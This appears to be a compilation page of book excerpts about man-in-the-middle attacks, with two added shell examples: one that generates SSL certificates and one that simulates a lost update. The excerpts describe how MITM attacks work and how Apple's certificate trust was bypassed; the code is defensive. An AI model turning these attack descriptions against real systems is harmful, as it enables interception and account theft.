Engineering Security by Peter Gutmann
active measures, address space layout randomization, air gap, algorithmic trading, Amazon Web Services, Asperger Syndrome, bank run, barriers to entry, bitcoin, Brian Krebs, business process, call centre, card file, cloud computing, cognitive bias, cognitive dissonance, cognitive load, combinatorial explosion, Credit Default Swap, crowdsourcing, cryptocurrency, Daniel Kahneman / Amos Tversky, Debian, domain-specific language, Donald Davies, Donald Knuth, double helix, Dr. Strangelove, Dunning–Kruger effect, en.wikipedia.org, endowment effect, false flag, fault tolerance, Firefox, fundamental attribution error, George Akerlof, glass ceiling, GnuPG, Google Chrome, Hacker News, information security, iterative process, Jacob Appelbaum, Jane Jacobs, Jeff Bezos, John Conway, John Gilmore, John Markoff, John von Neumann, Ken Thompson, Kickstarter, lake wobegon effect, Laplace demon, linear programming, litecoin, load shedding, MITM: man-in-the-middle, Multics, Network effects, nocebo, operational security, Paradox of Choice, Parkinson's law, pattern recognition, peer-to-peer, Pierre-Simon Laplace, place-making, post-materialism, QR code, quantum cryptography, race to the bottom, random walk, recommendation engine, RFID, risk tolerance, Robert Metcalfe, rolling blackouts, Ruby on Rails, Sapir-Whorf hypothesis, Satoshi Nakamoto, security theater, semantic web, seminal paper, Skype, slashdot, smart meter, social intelligence, speech recognition, SQL injection, statistical model, Steve Jobs, Steven Pinker, Stuxnet, sunk-cost fallacy, supply-chain attack, telemarketer, text mining, the built environment, The Death and Life of Great American Cities, The Market for Lemons, the payments system, Therac-25, too big to fail, Tragedy of the Commons, Turing complete, Turing machine, Turing test, Wayback Machine, web application, web of trust, x509 certificate, Y2K, zero day, Zimmermann PGP
…
Mind you, Apple didn’t just trust Verisign-issued certificates but any certificates that users dropped onto their devices, so it was possible to bypass the payment system in Apple’s app store by installing your own CA certificate on your iPhone, iPad, or Mac and having it “validate” purchases through you rather than through the real app store [239][240][241][242] (the fact that Apple took precautions to protect against outsiders but not against their own users is an example of projection bias, covered in more detail in “Confirmation Bias and other Cognitive Biases” on page 145). More than a year later the same issue was still present in Apple’s iMessage system, which trusted any CA-issued certificate (rather than only ones designated as being for the iMessage servers), allowing man-in-the-middle (MITM) attacks on communications with the iMessage servers. Since iMessage sends the AppleID and password in the clear (over the potentially MITM’d link), a single MITM on an iMessage communication would give an attacker access to the user’s iCloud accounts, backups, and everything else connected to their Apple account [243]. These problems were made even worse by the fact that the CA root certificate posted on Apple’s web site was for “Apple Root Certificate Authority” [244] while the iPhone one is for “Apple Root CA”, making it impossible to verify the certificates issued with it even if someone did track the other root certificate down on Apple’s web site, because the certificates are identified as coming from a different CA (this has since been corrected after Apple were informed of the problem).
…
To defeat SSL’s lack of server authentication all that a phisher has to do is set up their lures and wait for victims to scurry in, a fire-and-forget solution that requires no further effort from the attacker. In contrast, to defeat SSH’s lack of server authentication the attacker has to wait for the victim to connect to a predefined server and then perform an active man-in-the-middle attack [10], a considerably more difficult task (a longer discussion of the security of SSH’s server authentication is given in “Key Continuity in SSH” on page 377).

[10] Since ssharp is based on a modified, rather old, version of OpenSSH it’d be amusing to use one of the assorted OpenSSH security holes to attack the MITM while the MITM is attacking you.

SSL Certificates: Indistinguishable from Placebo

The security model used with SSL/TLS server certificates might be called honesty-box security: in some countries newspapers and similar low-value items are sold on the street by having a box full of newspapers next to a coin box (the honesty box) into which people are trusted to put the correct coins before taking out a paper.
Hands-On RESTful API Design Patterns and Best Practices by Harihara Subramanian
blockchain, business logic, business process, cloud computing, continuous integration, create, read, update, delete, cyber-physical system, data science, database schema, DevOps, disruptive innovation, domain-specific language, fault tolerance, information security, Infrastructure as a Service, Internet of things, inventory management, job automation, Kickstarter, knowledge worker, Kubernetes, loose coupling, Lyft, machine readable, microservices, MITM: man-in-the-middle, MVC pattern, Salesforce, self-driving car, semantic web, single page application, smart cities, smart contracts, software as a service, SQL injection, supply-chain management, web application, WebSocket
They intend to steal, eavesdrop on, impersonate and secretly relay, intercept, or alter communications, including API messages, between two communicating parties, all while it appears as though a normal exchange of information is underway. The preceding diagram depicts a typical MITM attack, where the eavesdropper impersonates the server and relays communications/responses to the caller as though they come from the server, so they appear genuine. An example of an MITM attack is communication with an API that issues a session token as part of an HTTP header, with a perpetrator acting as a man in the middle between the user's browser and the server. It is then easy to intercept that session token, which opens up access to the user's account; the damage that can be done depends on that account's privileges.

Common types of MITM attacks and protection measures

There are a few common MITM attacks, listed in the following, that you need to be aware of, along with a few protection measures against those attacks:

Sniffing: Sniffing, also known as packet sniffing, is where attackers use widely/freely available packet capture tools, together with specific wireless devices, to inspect and monitor packets communicated over a network.
…
Testing aspects of this vulnerability should focus on two essential scenarios—whether the user can directly browse a resource, and whether the UI accessing the API resources exposes an unauthorized resource to that UI.

Man-in-the-middle attacks

An MITM attack is an attack by a perpetrator who has placed themselves in the middle of a network or communication between a genuine user and an application server.
…
Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, Dave Mound
en.wikipedia.org, information security, Kickstarter, Minecraft, MITM: man-in-the-middle, SQL injection, web application
        if contenttype != 'nosniff':
            print 'X-Content-Type-Options not set properly'
    except:
        print 'X-Content-Type-Options not set'

The next Strict-Transport-Security header is used to force communication over an HTTPS channel, to prevent man-in-the-middle (MITM) attacks. The lack of this header means that the communication channel could be downgraded to HTTP by an MITM attack:

    try:
        hsts = req.headers['Strict-Transport-Security']
    except:
        print 'HSTS header not set, MITM attacks may be possible'

The final Content-Security-Policy header is used to restrict the type of resources that can load on the web page, for example, restricting where JavaScript can run:

    try:
        csp = req.headers['Content-Security-Policy']
        print 'Content-Security-Policy set:', csp
    except:
        print 'Content-Security-Policy missing'

The output from the recipe is shown in the following screenshot:

Brute forcing login through the Authorization header

Many websites use HTTP basic authentication to restrict access to content.
…
…
        if xssprotect != '1; mode=block':
            print 'X-XSS-Protection not set properly, XSS may be possible:', xssprotect
    except:
        print 'X-XSS-Protection not set, XSS may be possible'
    try:
        contenttype = req.headers['X-Content-Type-Options']
        if contenttype != 'nosniff':
            print 'X-Content-Type-Options not set properly:', contenttype
    except:
        print 'X-Content-Type-Options not set'
    try:
        hsts = req.headers['Strict-Transport-Security']
    except:
        print 'HSTS header not set, MITM attacks may be possible'
    try:
        csp = req.headers['Content-Security-Policy']
        print 'Content-Security-Policy set:', csp
    except:
        print 'Content-Security-Policy missing'
    print '----'

How it works…

This recipe is configured for testing many sites, so the first part reads in the URLs from the text file and prints out the current target:

    urls = open("urls.txt", "r")
    for url in urls:
        url = url.strip()
        req = requests.get(url)
        print url, 'report:'

Each header is then tested inside a try/except block.
Linux Security Cookbook by Daniel J. Barrett, Richard E. Silverman, Robert G. Byrnes
Debian, GnuPG, MITM: man-in-the-middle, web of trust
that a public keys is no longer valid obtaining keys from uploading new signatures to killing processes authorizing users to kill via sudo command pidof command, using terminating SSH agent on logout kinit command (Kerberos) 2nd 3rd -f option (forwardable credentials) klist command (Kerberos) 2nd known hosts database (OpenSSH server) kpasswd command (Kerberos) krb5.conf file, copying to new Kerberos host krb5.keytab file krb5kdc kstat (integrity checker) ksu (Kerberized su) authentication via Kerberos sharing root privileges via [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] last command 2nd lastb command lastcomm utility bugs in latest version lastdb command lastlog command databases from several systems, merging multiple systems, monitoring problems with ldd command libnet (toolkit for network packet manipulation) libnids (for TCP stream reassembly) libpcap (packet capture library) 2nd binary files Snort logging directory, creating in logging Snort data to libpcap-format files network trace files, ngrep Snort, use by libwrap, using with xinetd Linux /proc filesystem differing locations for binaries and configuration files in distributions encryption software included with operating system vulnerabilities Red Hat [See Red Hat Linux] supported distributions for security recipes SuSE [See SuSE Linux] ListenAddress statements, adding to sshd_config listfile module (PAM) ACL file entries local acces, permitting while blocking remote access local facilities (system messages) local filesystems, searching local key (Tripwire) creating with twinstall.sh script fingerprints, creating in secure integrity checks read-only integrity checking local mail (acceptance by SMTP server) local password authentication, using Kerberos with PAM localhost problems with Kerberos on SSH SSH port forwarding, use in unsecured mail sessions from logfile group configuration file (logwatch) logger program 
writing system log entries via shell scripts and syslog API logging access to services combining log files firewalls, configuring for nmap -o options, formats of PAM modules, error messages rotating log files service access via xinetd shutdowns, reboots, and runlevel changes in /var/log/wtmp Snort 2nd to binary files partitioning into separate files permissions for directory stunnel messages sudo command remotely system [See system logger] testing with nmap stealth operations loghost changing remote logging of system messages login shells, root logins adding another Kerberos principal to your ~/.k5login file Kerberos, using with PAM monitoring suspicious activity printing information about for each user recent logins to system accounts, checking testing passwords for strength CrackLib, using John the Ripper, using logouts, history of all on system logrotate program 2nd 3rd logwatch filter, defining integrating services into listing all sudo invocation attempts scanning log files for messages of interest scanning Snort logs and sending out alerts scanning system log files for problem reports lsh (SSH implementation) lsof command +M option, (for processes using RPC services) -c option (command name for processes) -i option (for network connections) -p option (selecting processes by ID) -u option (username for processes) /proc files, reading IP addresses, conversion to hostnames network connections for processes, listing [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] m4 macro processor MAC addresses controlling access by spoofed mail [See email IMAP POP] Mail application (Mozilla) mail clients connecting to mail server over SSL support for secure POP and IMAP using SSL mail facility (system messages) mail servers receiving Internet email without visible server support for SSL testing SSL connection locally Mailcrypt mc-deactivate-passwd to force passphrase erasure official web site 
using with GnuPG mailpgp (script for encrypting/sending email) mailsnarf command -v option, capturing only unencrypted messages malicious program, /tmp/ls man-in-the-middle (MITM) attacks dsniff, proof of concept with self-signed certificates, risk of services deployed with dummy keys manual integrity checks mask format, CIDR Massachusetts Institute of Technology (MIT) Kerberos matching anything (ALL keyword) 2nd max_load keyword (xinetd) 2nd mc-encrypt function MD5 checksum verifying for RPM-installed files merging system log files MH (mail handler) mirroring a set of files securely between machines MIT Kerberos MITM [See man-in-the-middle attacks] modules PAM CrackLib listfile 2nd pam_stack Perl Sys::Lastlog and Sys::Utmp Sys::Syslog XML::Simple monitoring systems for suspicious activity account use checking on multiple systems device special files directing system messages to log files displaying executed commands executed command, monitoring filesystems searching effectively finding accounts with no password finding superuser accounts finding writable files insecure network protocols, detecting local network activities log files, combining logging login passwords logins and passwords logwatch filter for services not supported lsof command, investigating processes with network-intrusion detection with Snort 2nd decoding alert messages logging output partitioning logs into files ruleset, upgrading and tuning networking observing network traffic with Ethereal GUI open network ports, testing for packet sniffing with Snort recovering from a hack rootkits rotating log files scanning log files for problem reports search path, testing searching for strings in network traffic security incident report, filing sending messages to system logger setuid and setgid programs, insecure syslog configuration, testing syslog messages, logging remotely tracing processes writing system log entries shell scripts with C with Perl scripts monitoring tools for networks NIH page web page 
information on morepgp (script for decrypting/reading email) mount command -o nodev (prohibiting device special files) grpid option noexec option nosuid option setuid and setgid programs, protecting against misuse mounts file (/proc) Mozilla certificate storage encrypted mail with Mail & Newsgroups Muffet, Alec (Crack utility) multi-homed hosts firewall for SSH client, problems with canonical hostname multi-homed server machines, socket mail server is listening on multicast packets multithreaded services (in inetd.conf) mutt mailer home web page securing POP/IMAP with SSL [ Team LiB ] [ Team LiB ] [SYMBOL] [A] [B] [C] [D] [E] [F] [G] [H] [I] [J] [K] [L] [M] [N] [O] [P] [Q] [R] [S] [T] [U] [V] [W] [X] NAMEINARGS flag for xinetd NAT gateway, canonical client hostname and National Infrastructure Protection Center (NIPC) (U.S.)
…
These keys are distributed with every Red Hat system: they are public knowledge. If you deploy a service using default, dummy keys, you are vulnerable to a man-in-the-middle (MITM) attack, in which the attacker impersonates your system using the well-known dummy private keys. Furthermore, the name in the certificate does not match your server's hostname, and the certificate is not issued by a recognized Certifying Authority; both of these conditions will be flagged as warnings by your mail client. [Recipe 4.4] To preserve the server authentication and MITM resistance features of SSL, generate a new key for your mail server, and obtain an appropriate certificate binding the key to your server's name.
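The steps the recipe calls for (a fresh private key, a certificate that carries the server's own name, and a check that what is installed and served is no longer the dummy) as an added shell example. This is not code from the Linux Security Cookbook; openssl(1) being installed, the hostname mail.example.com, the file paths and the IMAP-over-SSL port 993 are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example, not a recipe from the Linux Security Cookbook: replace a
# distribution-supplied dummy key/certificate with a fresh key and a
# certificate bound to the server's real name, then check what a
# certificate file actually claims. Assumes openssl(1) is installed;
# "mail.example.com" and the output paths are placeholders.

# Generate a new private key plus a certificate whose Common Name is the
# mail server's hostname. Self-signed here; for a CA-issued certificate
# drop -x509/-days, send the resulting CSR to the CA, and install what it
# returns. umask 077 keeps the new key readable by its owner only.
gen_key_and_cert() {       # hostname days keyfile certfile
  ( umask 077
    openssl req -x509 -newkey rsa:2048 -nodes -days "$2" \
        -subj "/CN=$1" -keyout "$3" -out "$4" >/dev/null 2>&1 )
}

# Print the Common Name of a certificate (what a mail client compares
# with the hostname it connected to).
cert_cn() {                # certfile
  openssl x509 -in "$1" -noout -subject -nameopt RFC2253 \
      | sed -n 's/^subject=[[:space:]]*.*CN=\([^,]*\).*/\1/p'
}

# Succeeds only if the certificate's CN equals the expected hostname.
cert_matches_host() {      # certfile hostname
  [ "$(cert_cn "$1")" = "$2" ]
}

# Succeeds if issuer equals subject: the certificate is self-signed and no
# recognized CA vouches for it, so clients will still warn about the
# issuer just as they do for the dummy certificates.
cert_is_self_signed() {    # certfile
  subj=$(openssl x509 -in "$1" -noout -subject -nameopt RFC2253 \
         | sed 's/^subject=[[:space:]]*//')
  iss=$(openssl x509 -in "$1" -noout -issuer -nameopt RFC2253 \
        | sed 's/^issuer=[[:space:]]*//')
  [ "$subj" = "$iss" ]
}

# Show the certificate a running server presents, so a dummy certificate
# is caught after deployment (IMAP over SSL listens on 993). This makes a
# network connection and is not exercised by the offline checks.
show_served_cert() {       # hostname port
  openssl s_client -connect "$1:$2" -servername "$1" </dev/null 2>/dev/null \
      | openssl x509 -noout -subject -issuer -dates
}
```

Run gen_key_and_cert once, install the key and certificate where the IMAP or POP daemon expects them, restart the daemon, then point show_served_cert at the live port. If cert_is_self_signed still succeeds on the served certificate, the name warning is gone but the issuer warning remains, and the fix is a certificate from a CA the clients already trust (or a deliberate import of the self-signed one into each client).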
…
. (period), in search path .gpg suffix (binary encrypted files) .shosts file / (slash), beginning absolute directory names /dev directory /dev/null, redirecting standard input from /proc files filesystems networking, important files for (/proc/net/tcp and /proc/net/udp) /sbin/ifconfig /sbin/ifdown /sbin/ifup /tmp/ls (malicious program) /usr/share/ssl/cert.pem file /var/account/pacct /var/log/lastlog /var/log/messages /var/log/secure unauthorized sudo attempts, listing /var/log/utmp /var/log/wtmp : (colons), current directory in empty search path element @ character, redirecting log messages to another machine @otherhost syntax, syslog.conf ~/.ssh directory, creating and setting mode ~/.ssh/config file
absolute directory names access control lists (ACLs), creating with PAM access_times attribute (xinetd) accounting [See process accounting] acct RPM accton command (for process accounting) addpol command (Kerberos) administrative privileges, Kerberos user administrative system, Kerberos [See kadmin utility] agents, SSH [See also ssh-agent] forwarding, disabling for authorized keys terminating on logout using with Pine Aide (integrity checker) alerts, intrusion detection [See Snort] aliases for hostnames changing SSH client defaults for users and commands (with sudo) ALL keyword user administration of their own machines (not others) AllowUsers keyword (sshd) Andrew Filesystem kaserver ank command (adding new Kerberos principal) apache (/etc/init.d startup file) append-only directories apply keyword (PAM, listfile module) asymmetric encryption [See also public-key encryption] attacks anti-NIDS attacks buffer overflow detection with ngrep indications from system daemon messages dictionary attacks on terminals dsniff, using to simulate inactive accounts still enabled, using man-in-the-middle (MITM) risk with self-signed certificates services deployed with dummy keys operating system vulnerability to forged connections setuid root program hidden in filesystems on specific protocols system hacked via the network vulnerability to, factors in attributes (file), preserving in remote file copying authconfig utility imapd, use of general system authentication Kerberos option, turning on AUTHENTICATE command (IMAP) authentication cryptographic, for hosts for email sessions [See email IMAP] interactive, without password [See ssh-agent] Internet Protocol Security (IPSec) Kerberos [See Kerberos authentication] OpenSSH [See SSH] PAM (Pluggable Authentication Modules) [See PAM] SMTP [See SMTP] specifying alternate username for remote file copying SSH (Secure Shell) [See SSH] SSL (Secure Sockets Layer) [See SSL] by trusted host [See trusted-host authentication] authentication keys for Kerberos users and hosts authorization root user ksu (Kerberized su) command multiple root accounts privileges, dispensing running root login shell running X programs as SSH, use of sudo command sharing files using groups sharing root privileges via Kerberos via SSH sudo command allowing user authorization privileges per host bypassing password authentication forcing password authentication granting privileges to a group killing processes with logging remotely password changes read-only access to shared file restricting root privileges running any program in a directory running commands as another user starting/stopping daemons unauthorized attempts to invoke, listing weak controls in trusted-host authentication authorized_keys file (~/.ssh directory) forced commands, adding to authpriv facility (system messages)
backups, encrypting bash shell process substitution benefits of computer security, tradeoffs with risks and costs Berkeley database library, use by dsniff binary data encrypted files libpcap-format files searching for with ngrep -X option binary format (DER), certificates converting to PEM binary-format detached signature (GnuPG) bootable CD-ROM, creating securely broadcast packets btmp file, processing with Sys::Utmp module buffer overflow attacks detection with ngrep indicated by system daemon messages about names
C programs functions provided by system logger API writing to system log from CA (Certifying Authority) setting up your own for self-signed certificates SSL Certificate Signing Request (CSR), sending to Verisign, Thawte, and Equifax CA.pl (Perl script) cage, chroot (restricting a service to a particular directory) canonical hostname for SSH client finding with Perl script inconsistencies in capture filter expressions Ethereal, use of CERT Coordination Center (CERT/CC), incident reporting form cert.pem file adding new SSL certificate to validating SSL certificates in certificates generating self-signed X.509 certificate revocation certificates for keys distributing SSL converting from DER to PEM creating self-signed certificate decoding dummy certificates for imapd and pop3d generating Certificate Signing Request (CSR) installing new mutt mail client, use of setting up CA and issuing certificates validating verifying testing of pre-installed trusted certificates by Evolution Certifying Authority [See CA] certutil challenge password for certificates checksums (MD5), verifying for RPM-installed files chkconfig command enabling load commands for firewall KDC and kadmin servers, starting at boot process accounting packages, running at boot Snort, starting at boot chkrootkit program commands invoked by chmod (change mode) command preventing directory listings removing setuid or setgid bits setting sticky bit on world-writable directory world-writable files access, disabling chroot program, restricting services to particular directories CIAC (Computer Incident Advisory Capability), Network Monitoring Tools page Classless InterDomain Routing (CIDR) mask format client authentication [See Kerberos PAM SSH SSL trusted-host authentication] client programs, OpenSSH closelog function using in C program colons (:), referring to current working directory command-line arguments avoiding long prohibiting for command run via sudo Common Log Format (CLF) for URLs Common Name self-signed certificates compromised systems, analyzing Computer Emergency Response Team (CERT) Computer Incident Advisory Capability (CIAC) Network Monitoring Tools page computer security incident response team (CSIRT) copying files remotely name-of-source and name-of-destination rsync program, using scp program remote copying of multiple files Coroner's Toolkit (TCT) cps keyword (xinetd) Crack utility (Alec Muffet) cracking passwords CrackLib program, using John the Ripper software, using CRAM-MD5 authentication (SMTP) credentials, Kerberos forwardable listing with klist command obtaining and listing for users cron utility authenticating in jobs cron facility in system messages integrity checking at specific times or intervals restricting service access by time of day (with inetd) secure integrity checks, running crypt++ (Emacs package) cryptographic authentication for hosts Kerberos [See Kerberos authentication] plaintext keys using with forced command public-key authentication between OpenSSH client and SSH2 server, using OpenSSH key between OpenSSH client and SSH2 server, using SSH2 key between SSH2 client/OpenSSH server with ssh-agent SSH [See SSH] SSL [See SSL] by trusted hosts [See trusted-host authentication] cryptographic hardware csh shell, terminating SSH agent on logout CSR (Certificate Signing Request) passphrase for private key current directory colons (:) referring to Linux shell scripts in CyberTrust SafeKeyper (cryptographic hardware)
daemons IMAP, within xinetd imapd [See imapd] inetd [See inetd] Kerberized Telnet daemon, enabling mail, receiving mail without running POP, enabling within xinetd or inetd sendmail, security risks with visibility of Snort, running as sshd [See sshd] starting/stopping via sudo tcpd using with inetd using with xinetd Telnet, disabling standard xinetd [See xinetd] dangling network connections, avoiding date command DATE environment variable datestamps, handling by logwatch Debian Linux, debsums tool debugging debug facility, system messages Kerberized authentication on Telnet Kerberos authentication on POP Kerberos for SSH PAM modules SSL connection problems from server-side dedicated server, protecting with firewall denial-of-service (DOS) attacks preventing Snort detection of vulnerability to using REJECT DENY absorbing incoming packets (ipchains) with no response pings, preventing REJECT vs.
Service Design Patterns: Fundamental Design Solutions for SOAP/WSDL and RESTful Web Services by Robert Daigneau
Amazon Web Services, business intelligence, business logic, business process, continuous integration, create, read, update, delete, en.wikipedia.org, fault tolerance, loose coupling, machine readable, MITM: man-in-the-middle, MVC pattern, OSI model, pull request, RFC: Request For Comment, Ruby on Rails, software as a service, web application
Consider the case where client A and client B both retrieve data on customer C at the same time. Let’s say client A updates and saves this record, then client B does the same. If client A immediately reads the data on customer C again, it may appear as though their update was lost because they now see client B’s updates.

Man-in-the-Middle Attack (MITM)—Occurs when a third party intercepts communications between a client and service. In the case of web services, the malicious party co-opts the TCP connection between the client and the server. The end result is that the client has a connection to the middleman, which also has a connection to the target service.
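The race described above, as an added shell simulation that is not from Service Design Patterns. A one-line file stands in for the customer C record (the "version value" format is an assumption of the demo); two clients read it at the same version, and a blind write loses A's change, while a compare-and-set write, the file-level equivalent of an HTTP PUT guarded by If-Match on an ETag, refuses B's stale write so that B must re-read and retry. The version check is the standard mitigation and goes beyond what the passage itself states.

```shell
#!/bin/sh
# Added example, not from Service Design Patterns: the lost-update race
# from the text, run against a one-record "datastore" (a file holding
# "version value"), first with blind overwrites and then with a
# compare-and-set that rejects a stale version. Record format and the
# use of a temp file are assumptions for the demonstration.

# Current version number and value of the record.
rec_version() { cut -d' ' -f1 "$1"; }      # file
rec_value()   { cut -d' ' -f2- "$1"; }     # file

# Blind write: the version the client read is never checked, so a slower
# client silently overwrites a faster client's change (the Lost Update).
blind_write() {            # file value
  ver=$(rec_version "$1")
  printf '%s %s\n' "$((ver + 1))" "$2" > "$1"
}

# Compare-and-set: the client sends the version it read; the write is
# refused (return 1) unless that version is still current. This is what
# an HTTP PUT with If-Match: <etag> gives a Resource API. A mkdir lock
# makes the check-then-write atomic between concurrent clients.
cas_write() {              # file expected_version value
  lock="$1.lock"
  until mkdir "$lock" 2>/dev/null; do sleep 1; done
  ver=$(rec_version "$1")
  if [ "$ver" != "$2" ]; then rmdir "$lock"; return 1; fi
  printf '%s %s\n' "$((ver + 1))" "$3" > "$1"
  rmdir "$lock"
}

# The scenario from the text: A and B both read customer C, A saves,
# then B saves. Prints the value left in the record afterwards.
final_value() {            # mode: blind | cas
  db=$(mktemp)
  printf '1 credit limit 1000\n' > "$db"
  a_ver=$(rec_version "$db")   # client A reads version 1
  b_ver=$(rec_version "$db")   # client B reads version 1 at the same time
  if [ "$1" = blind ]; then
    blind_write "$db" "credit limit 2000 (A)"
    blind_write "$db" "phone updated (B)"        # clobbers A's change
  else
    cas_write "$db" "$a_ver" "credit limit 2000 (A)"
    # B's version is now stale: the write is refused and B must re-read
    # C (seeing A's change) before retrying.
    cas_write "$db" "$b_ver" "phone updated (B)" || true
  fi
  rec_value "$db"
  rm -f "$db"
}
```

final_value blind ends with B's text and A's change gone; final_value cas ends with A's change intact and B holding a rejected write to retry. The lock is the part people forget: without it two cas_write calls can both pass the version check before either has written.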
…
See also Response time Datasource Adapter, 140–141 definition, 285 Request Mapper, 113 web service API styles, 16 Layered systems, 46 Leveraging commodity caching technologies, 45 Linked Services adding/removing services, 79 address formatting, 79 benefits of, 78–79 breaking clients, avoiding, 79 description, 53 effects on web service evolution, 265 examples, 80–82 overview, 77–79 Response Mapper, 125–126 use for, 53 Web service calls, sequence of, 77 workflow guidance, 78–79 Linked Services, considerations hyperlinks, 80 security, 80 using with Resource APIs, 79–80 Load balancing, 5–6, 285–286 Local objects, 3–6 Location transparency, 22, 173–174 Loggers, intercepting, 201–303. See also Service Interceptor Long-running processes, 188. See also Workflow Connector Loose coupling, 9–10 Lost Update Problem, 49, 286 M Man-in-the-Middle Attack (MITM), 286 Mapper [POEAA], 272. See also Request Mapper; Response Mapper Marshal. See Serializing data Media preferences. See Media Type Negotiation Media Type Negotiation content negotiation, 71–73 description, 53 media type preferences, 70 overview, 70–73 Request Handler, selecting, 71–72 URIs, as file extensions, 70 use for, 53 Media Type Negotiation, considerations client-driven negotiations vs.
…
See Tolerant Reader delivery assurance, Idempotent Retry example, 217–219 structural changes to, 229–230 Messages, ESB canonical set, 222 converting to canonical form, 222–223 Guaranteed Delivery [EIP], 223–224 Message Stores [EIP], 223–224 Orchestration Engines, 224–225 routing, 222 workflow management, 224–225 Microformat, definition, 286 MIDL (Microsoft Interface Definition Library), 287 MIME (Multipurpose Internet Mail Extensions), 287. See also Media type MITM (Man-in-the-Middle Attack), 286 MOM (Message-Oriented Middleware), web service alternative, 8–9 MSMQ (Microsoft Message Queuing), 287 MTOM (Message Transmission Optimization Mechanism), 286 MVC pattern. See ASP.NET MVC
N NAck (Negative Acknowledgment), 61 Naming DTOs, 99 Negotiating media preferences. See Media Type Negotiation Network efficiency, Service Descriptors, 177–178 Nondeterministic content models, 287 Normalizer [EIP], 273 Notification.
The Best of 2600: A Hacker Odyssey by Emmanuel Goldstein
affirmative action, Apple II, benefit corporation, call centre, disinformation, don't be evil, Firefox, game design, Hacker Ethic, hiring and firing, information retrieval, information security, John Markoff, John Perry Barlow, late fees, license plate recognition, Mitch Kapor, MITM: man-in-the-middle, Oklahoma City bombing, optical character recognition, OSI model, packet switching, pirate software, place-making, profit motive, QWERTY keyboard, RFID, Robert Hanssen: Double agent, rolodex, Ronald Reagan, satellite internet, Silicon Valley, Skype, spectrum auction, statistical model, Steve Jobs, Steve Wozniak, Steven Levy, Telecommunications Act of 1996, telemarketer, undersea cable, UUNET, Y2K
Anyhow, I hope this proves interesting for some of you wireless hackers out there.

An Old Trick for a New Dog—WiFi and MITM (Winter, 2004-2005) by uberpenguin

If you are reading this magazine, it is probably safe to assume you are familiar with the concept of a man-in-the-middle attack (which from here will be referred to as MITM for brevity) as it pertains to networking resources. In this article I hope to point out how this old and well known concept can be applied to an 802.11 WiFi network. I will use a case study of a fairly large wireless network I have access to in order to illustrate a possible scenario of a WiFi MITM attack.

The Network

First, let’s establish that gaining access to the network is not going to be discussed here.
…
(Ed Cummings), saga, 531–534 Clipper Chip, 556 against COCOTs, 458 defendants forced to accept plea agreement, 547–550 Digital Telephony Bill passes, 559–561 EFF, defined, 501–503 EFF, lawsuit against, 511 freedom of speech on Net, 538–540 fun ways to prosecute hackers, 555–556 hacker-bashing in Congress, 550–552 hackers and, 491–492 hackers in jail, 526–528 hackers vs. criminals, 553–554 hysteria dictating, 562 inspiring events, 557–559 Kevin Mitnick case, 528–530, 534–535 learning from hackers, 554–555 major crackdowns, 523–526 misunderstanding of new technology, 552–553 misunderstanding of technology, 562–565 negative feedback about hackers, 503–509 no more secrets, 535–538 Operation Sun Devil. see Operation Sun Devil poorly designed systems, 554 publicity facts and rumors, 509–510 punishments outweighing crimes, 544–546 Secret Service and 2600. see Secret Service and 2600 meetings Steve Jackson wins lawsuit, 511 violence, vandals and victims, 566–569 lawsuits, 2000 and beyond, 573–599 DeCSS trial, 584–585, 587–589 freedom of speech, 594–596 H2K conference, 589–591 Kevin Mitnick, 586–587 litigation madness of, 580–584 MPAA lawsuit against 2600, 576–580 overview of, 573–575 positivity, 596–599 signs of hope, 591–594 what we are losing, 575–576 LCC EPROMs, 427 LCD displays electronic pay phones, 39–40 hacking soda machines, 721–722 New York MTA turnstiles, 789 LECs (Local Exchange Carriers) defined, 490 directory assistance idiocy, 655–657 incoming international collect fraud and, 480 revenue from access charges, 488–489 third-party billing fraud and, 478–479 LED signs, hacking, 325–327 Left Hand Side (LHS), RFC822 mail addresses, 153–155 Legion of Doom charges against, 495–496 overview of, 525 sentencing of three members of, 509–510 statement from, 497 Legions of the Underground (LoU), 260 Letter Sorting Machine (LSM), USPS, 374–375, 377 LFSRs (Linear Feedback Shift Registers), DeCSS code, 584–585 LG cell phones, 747–748 LHS (Left Hand Side), RFC822 mail addresses, 153–155 Light Guide cabling, 53 Lightning, Knight (Craig Neidorf) bittersweet victory of, 501 EFF legally intervenes in case of, 502–503 facts and rumors, 509–510 indictment against, 494–495 views from a Fed, 384–385 line reversal, pay phones, 38 Linear Feedback Shift Registers (LFSRs), DeCSS code, 584–585 linear LNBs, 763 Link Access Protocol for D-channel, modified (LAPDm), GSM, 431 LinNeighborhood program, 742–743 linux-wlan-ng drivers, 739 listening devices. see surveillance devices LNB (Low Noise Block), satellite dishes, 762–763 Local Access Transport Area (LATA), 488–490 Local Exchange Carriers. see LECs (Local Exchange Carriers) local toll calling, 488 location area identifiers (LAIs), GSM phones, 431, 433 location updating, GSM phones, 433 lock picks, 777–780 locks, hacking. see Simplex locks LocusLink, 824 LOD. see Legion of Doom login hacking into VMS systems, 130 hacking University Applications Processing Center, 134–135 hacking voicemail, 472 RSTS/E, 127–128 logistics, lottery, 781 Long Distance Wholesale Club, 484 long-distance services 1986 suggestions for, 139–140 calling card fraud, 423–424 catching phone phreaks, 109–112 dark side of Ma Bell breakup, 71–73 divesture and, 82–85 equal access and, 93–97 hacker view on toll fraud, 219–220 hacking pay phones, 655 how companies work, 66–67 IBM audio distribution systems, 69–71 in-band signaling principles, 27–28 MCI, 67–69 microwave links, 67 multi-carrier toll abuse, 222–223 pay phone rates, 446–447 signaling system for, 27 successful teleconferencing, 76–82 Travelnet, 73–76 where charges come from, 487–490 long-range listening devices, surveillance, 350 loop extenders, 359 loops, Michigan, 12–13 lottery, hacking, 780–785 application, 783–784 conclusions, 784–785 logistics, 781 myths, 784 observing, 646–648 overview of, 780–781 procedure, 782–783 statistics, 781–782 LoU (Legions of the Underground), 260 Low Noise Block (LNB), satellite dishes, 762–763 LSM (Letter Sorting Machine), USPS, 374–375, 377 Luciferase gene, 822–824 Lyngsat Satellite Index, 765
